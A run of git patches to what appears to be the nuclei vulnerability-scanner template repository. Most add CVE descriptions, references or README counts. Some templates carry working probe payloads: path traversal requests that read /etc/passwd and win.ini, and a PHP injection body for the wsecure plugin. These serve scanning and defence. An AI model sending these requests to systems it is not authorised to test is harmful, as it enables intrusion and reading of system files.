+ 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index a42dbf3e4b..40a4e59745 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -4,6 +4,7 @@ info: name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin From a5efbf1289a9d7928b998552f2ca161014c5f0a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:13:22 +0000 Subject: [PATCH 048/132] Auto Update README [Fri Jul 16 05:13:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 437101d33b..ff56b294ff 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1555 files**. +**128 directories, 1556 files**. From be7247bc77c743ce064323a3e5cfad1b3d10898f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:44:57 +0530 Subject: [PATCH 049/132] Update CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 7fccdaa7b6..ecf71fafc7 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -4,7 +4,10 @@ info: name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. + reference: | + - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin requests: From 71e397625c682e82c103df281566d5c116565532 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:19:51 +0000 Subject: [PATCH 050/132] Auto Update README [Fri Jul 16 05:19:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ff56b294ff..71de9e5dcd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1556 files**. +**128 directories, 1558 files**. From a047cd77ffc21f2f9c5d61bb05851681461cdbe6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:50:55 +0530 Subject: [PATCH 051/132] Update CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 7fd40c1e11..3d321b4c8f 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -4,6 +4,7 @@ info: name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin From a78e6caafcff2a11bbcefd2970238a92458791a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:57:50 +0530 Subject: [PATCH 052/132] Update CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index fa833c4377..f067dd1e34 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -4,6 +4,7 @@ info: name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 tags: cve,cve2019,wordpress,xss,wp-plugin From a08eed7ce80312cf2d119dfa75b493b1c1259f1f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:00:01 +0530 Subject: [PATCH 053/132] Update CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 405bd13a64..55c9e48f5d 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -4,7 +4,10 @@ info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: | + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin requests: From b7357ba87137e6442972254311396e32a58da0b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:30:52 +0000 Subject: [PATCH 054/132] Auto Update README [Fri Jul 16 05:30:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 71de9e5dcd..7509741656 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1558 files**. +**128 directories, 1559 files**. From da4b0d4da78c5db9335f856fc84de711a03f0412 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:01:29 +0530 Subject: [PATCH 055/132] Update CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index e136ee5786..79a0cbd39f 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -4,6 +4,7 @@ info: name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin From a1ccf71bede31e207381362b1b008f1b24bc9ac6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:33:01 +0000 Subject: [PATCH 056/132] Auto Update README [Fri Jul 16 05:33:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7509741656..13cd0e31bd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1559 files**. +**128 directories, 1561 files**. From f977df559c27e75c3d4da4b08abe23b38aafbd42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:05:11 +0530 Subject: [PATCH 057/132] Update CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index e78227f474..4f305a6330 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -4,6 +4,7 @@ info: name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 tags: cve,cve2018,wordpress,xss,wp-plugin From 222ff1b14336d66e0791d412ae26b642c931a4fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:38:12 +0000 Subject: [PATCH 058/132] Auto Update README [Fri Jul 16 05:38:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13cd0e31bd..7663833b39 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1561 files**. +**128 directories, 1564 files**. From 0c4a223fa0a19d54ed25bf9a758f39976db198f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:13:17 +0530 Subject: [PATCH 059/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 3110e9b2eb..2894158ab8 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -5,7 +5,10 @@ info: author: daffainfo severity: critical description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + reference: | + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce requests: From 6aef9702587db6fb0cb5cda23e419adae82fc206 Mon Sep 17 00:00:00 2001 From: Regala Date: Fri, 16 Jul 2021 12:19:30 +0100 Subject: [PATCH 060/132] Update CVE-2020-17362.yaml Added "nova-lite" matcher; massively reduce false positives. --- cves/2020/CVE-2020-17362.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 2e265da33c..0fdc277777 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -20,6 +20,11 @@ requests: - "" part: body + - type: word + words: + - "nova-lite" + part: body + - type: word part: header words: From 90776cea1c4b9154f0428c009b7400b8ca2efd53 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:52:12 +0700 Subject: [PATCH 061/132] Create CVE-2020-14461.yaml --- cves/2020/CVE-2020-14461.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14461.yaml diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2020/CVE-2020-14461.yaml new file mode 100644 index 0000000000..748517d9db --- /dev/null +++ b/cves/2020/CVE-2020-14461.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14461 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 From 134031c9aa06bbd3b26de0e16cba1c1527dad1e2 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:56:28 +0700 Subject: [PATCH 062/132] Update and rename cves/2020/CVE-2020-14461.yaml to cves/2018/CVE-2018-12031.yaml --- cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename cves/{2020/CVE-2020-14461.yaml => 2018/CVE-2018-12031.yaml} (86%) diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2018/CVE-2018-12031.yaml similarity index 86% rename from cves/2020/CVE-2020-14461.yaml rename to cves/2018/CVE-2018-12031.yaml index 748517d9db..234cdfb650 100644 --- a/cves/2020/CVE-2020-14461.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -1,4 +1,4 @@ -id: CVE-2020-14461 +id: CVE-2018-12031 info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal @@ -6,9 +6,9 @@ info: severity: high reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 - https://www.exploit-db.com/exploits/48614 - tags: cve,cve2020,lfi + tags: cve,cve2018,lfi requests: - method: GET From 049d63066580360ed4c803fc7b153a6cbc2798b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 11:57:56 +0000 Subject: [PATCH 063/132] Auto Update README [Fri Jul 16 11:57:56 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7663833b39..01cd40a7af 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1564 files**. +**128 directories, 1565 files**. From f4f05394e1b55aa02f76b4d009b1978a6007e6de Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:30:35 +0530 Subject: [PATCH 064/132] Update CVE-2020-35713.yaml --- cves/2020/CVE-2020-35713.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35713.yaml b/cves/2020/CVE-2020-35713.yaml index 7e3e77e0b3..d65d7e96c6 100644 --- a/cves/2020/CVE-2020-35713.yaml +++ b/cves/2020/CVE-2020-35713.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page. - tags: cve,cve2020,linksys,rce,oob + tags: cve,cve2020,linksys,rce,oob,router requests: - raw: From 7a1f0e6f07b644e711ee8b4caebfe1dba23fbe6b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:02:47 +0000 Subject: [PATCH 065/132] Auto Update README [Fri Jul 16 12:02:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 01cd40a7af..901734b061 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 440 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1565 files**. +**128 directories, 1566 files**. From 4238febae30396e470911768bd7dc1b984c4c9ed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:33:02 +0530 Subject: [PATCH 066/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 234cdfb650..783f92a2eb 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -4,6 +4,7 @@ info: name: Eaton Intelligent Power Manager 1.6 - Directory Traversal author: daffainfo severity: high + description: Local file inclusion in Eaton Intelligent Power Manager v1.6 allows an attacker to include a file, it can lead to sensitive information disclosure, denial of service and code execution. reference: | - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion - https://nvd.nist.gov/vuln/detail/CVE-2018-12031 From 0f923915c9554b49da1c1cc6851fa0b6094a8f30 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:04:11 +0000 Subject: [PATCH 067/132] Auto Update README [Fri Jul 16 12:04:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 901734b061..37376e9821 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 441 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1566 files**. +**128 directories, 1567 files**. From 110a989ff1559476601a1857c63fc261ed9c56ac Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:36:12 +0530 Subject: [PATCH 068/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 783f92a2eb..264af49d7a 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,12 +15,15 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini matchers-condition: and matchers: - type: regex regex: - "root:[0*]:0:0" + - "\\[(font|extension|file)s\\]" + condition: or part: body - type: status status: From 304ab07b28b03afd1415fdce40612517cacd67e3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:00 +0530 Subject: [PATCH 069/132] Update CVE-2018-12031.yaml --- cves/2018/CVE-2018-12031.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-12031.yaml b/cves/2018/CVE-2018-12031.yaml index 264af49d7a..0fc4b182f1 100644 --- a/cves/2018/CVE-2018-12031.yaml +++ b/cves/2018/CVE-2018-12031.yaml @@ -15,7 +15,7 @@ requests: - method: GET path: - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini + - "{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini" matchers-condition: and matchers: From 9ab9617b9575b64a0b0cfdc238fcbecaccf41c3a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:42:41 +0530 Subject: [PATCH 070/132] Update CVE-2019-16525.yaml --- cves/2019/CVE-2019-16525.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16525.yaml b/cves/2019/CVE-2019-16525.yaml index 23b3cdac75..3ff0907f88 100644 --- a/cves/2019/CVE-2019-16525.yaml +++ b/cves/2019/CVE-2019-16525.yaml @@ -4,6 +4,7 @@ info: name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16525 tags: cve,cve2019,wordpress,xss,wp-plugin From f527e790e8892bf613fd1313a4d20d6182da0e14 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:14:28 +0000 Subject: [PATCH 071/132] Auto Update README [Fri Jul 16 12:14:28 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37376e9821..2f4963bdbf 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 442 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1567 files**. +**128 directories, 1568 files**. From 429bb01311ea967964cf2920178ac05cc3cd641a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:46:33 +0530 Subject: [PATCH 072/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 2894158ab8..eeea3b13d7 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -15,13 +15,13 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world." + - "Hello, world CVE-2016-10960." condition: and - type: status status: From f857247e84ec15b720132304d00182e14ad56fa9 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 19:17:49 +0700 Subject: [PATCH 073/132] Create CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2019/CVE-2019-20085.yaml diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml new file mode 100644 index 0000000000..3e678c02f3 --- /dev/null +++ b/cves/2019/CVE-2019-20085.yaml @@ -0,0 +1,25 @@ +id: CVE-2019-20085 + +info: + name: TVT NVMS 1000 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2019-20085 + - https://www.exploit-db.com/exploits/48311 + tags: cve,cve2019,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../../../../../../../../../../Windows/win.ini" + + matchers-condition: and + matchers: + - type: regex + regex: + - "\\[(font|extension|file)s\\]" + part: body + - type: status + status: + - 200 From eaba7dc5defcf9fbc6db5818c8c53aa4e121f6ad Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:54:37 +0530 Subject: [PATCH 074/132] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index eeea3b13d7..68f7e2616c 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -15,14 +15,15 @@ requests: - method: POST path: - "{{BaseURL}}/wp-content/plugins/wsecure/wsecure-config.php" - body: 'wsecure_action=update&publish=";} echo "Hello, world CVE-2016-10960."; class WSecureConfig2 {var $test="' + body: 'wsecure_action=update&publish=";} header("Nuclei: CVE-2016-10960"); class WSecureConfig2 {var $test="' matchers-condition: and matchers: - type: word words: - - "Hello, world CVE-2016-10960." + - "Nuclei: CVE-2016-10960" condition: and + part: header - type: status status: - 200 From 17402e9f64ea1ed0754a3da5c267264ad56fbcd5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 12:27:47 +0000 Subject: [PATCH 075/132] Auto Update README [Fri Jul 16 12:27:47 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2f4963bdbf..cb2a5b5166 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 443 | vulnerabilities | 234 | exposed-panels | 200 | +| cves | 444 | vulnerabilities | 234 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1568 files**. +**128 directories, 1569 files**. From 379345fc051689530a728cd11e694f83245e43ff Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 17:57:49 +0530 Subject: [PATCH 076/132] Update CVE-2019-20085.yaml --- cves/2019/CVE-2019-20085.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml index 3e678c02f3..8d5916a7ae 100644 --- a/cves/2019/CVE-2019-20085.yaml +++ b/cves/2019/CVE-2019-20085.yaml @@ -1,7 +1,7 @@ id: CVE-2019-20085 info: - name: TVT NVMS 1000 - Directory Traversal + name: TVT 